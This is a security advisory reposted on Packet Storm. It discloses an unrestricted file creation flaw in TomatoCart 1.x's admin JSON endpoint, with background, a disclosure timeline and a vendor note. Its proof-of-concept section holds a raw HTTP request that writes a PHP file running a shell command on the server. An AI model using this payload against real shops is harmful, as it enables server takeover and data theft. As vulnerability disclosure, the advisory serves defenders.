what you don't know can hurt you

TomatoCart 1.x Unrestricted File Creation

TomatoCart 1.x Unrestricted File Creation
Posted Jan 4, 2013
Authored by Aung Khant | Site yehg.net

TomatoCart 1.x versions are susceptible to an unrestricted file creation vulnerability.

tags | exploit
MD5 | 9320e51242a937a70f2850016cb6ce4b

TomatoCart 1.x Unrestricted File Creation

Change Mirror Download
1. OVERVIEW

TomatoCart 1.x versions are vulnerable to Unrestricted File Creation.


2. BACKGROUND

TomatoCart is an innovative Open Source shopping cart solution
developed by Wuxi Elootec Technology Co., Ltd. It is forked from
osCommerce 3 as a separate project and is released under the GNU
General Public License V2. Equipped with the web2.0 Technology Ajax
and Rich Internet applications (RIAs), TomatoCart Team is devoted to
building a landmark eCommerce solution.


3. VULNERABILITY DESCRIPTION

TomatoCart 1.x versions contain a flaw related to the /admin/json.php
script's failure to properly restrict created files. This may allow an
attacker to create arbitrary shell script to launch further attacks on
the application server.


4. VERSIONS AFFECTED

Tested on 1.1.8, 1.1.5


5. PROOF-OF-CONCEPT/EXPLOIT

/////////////////////////////////////////////////////////////////////
POST /admin/json.php HTTP/1.1
Host: localhost
Cookie: admin_language=en_US; toCAdminID=edfd1d6b88d0c853c2b83cc63aca5e14
Content-Type: application/x-www-form-urlencoded
Content-Length: 195

module=file_manager&action=save_file&file_name=0wned.php&directory=/&token=edfd1d6b88d0c853c2b83cc63aca5e14&ext-comp-1277=0wned.php&content=<?+echo
'<h1>0wned!</h1><pre>';+echo `ls+-al`; ?>
///////////////////////////////////////////////////////////////


6. SOLUTION

The vendor did not show commitment in hardening the application.
It is recommended to use alternative shopping cart application with
good track record of security fixes.


7. VENDOR

Wuxi Elootec Technology Co., Ltd.


8. CREDIT

Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2012-04-22: Contacted the vendor through email
2012-04-29: Vendor replied and the vulnerability detail was sent
2013-01-04: Vulnerability not fixed
2013-01-04: Vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/%5Btomatocart1.x%5D_arbitrary_file_creation
TomatoCart Home Page: http://www.tomatocart.com/

#yehg [2013-01-04]

---------------------------------
Best regards,
YGN Ethical Hacker Group
Yangon, Myanmar
http://yehg.net
Our Lab | http://yehg.net/lab
Our Directory | http://yehg.net/hwd

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

September 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    1 Files
  • 2
    Sep 2nd
    38 Files
  • 3
    Sep 3rd
    30 Files
  • 4
    Sep 4th
    15 Files
  • 5
    Sep 5th
    12 Files
  • 6
    Sep 6th
    17 Files
  • 7
    Sep 7th
    3 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    24 Files
  • 10
    Sep 10th
    22 Files
  • 11
    Sep 11th
    22 Files
  • 12
    Sep 12th
    15 Files
  • 13
    Sep 13th
    5 Files
  • 14
    Sep 14th
    2 Files
  • 15
    Sep 15th
    1 Files
  • 16
    Sep 16th
    11 Files
  • 17
    Sep 17th
    16 Files
  • 18
    Sep 18th
    8 Files
  • 19
    Sep 19th
    14 Files
  • 20
    Sep 20th
    20 Files
  • 21
    Sep 21st
    3 Files
  • 22
    Sep 22nd
    1 Files
  • 23
    Sep 23rd
    17 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close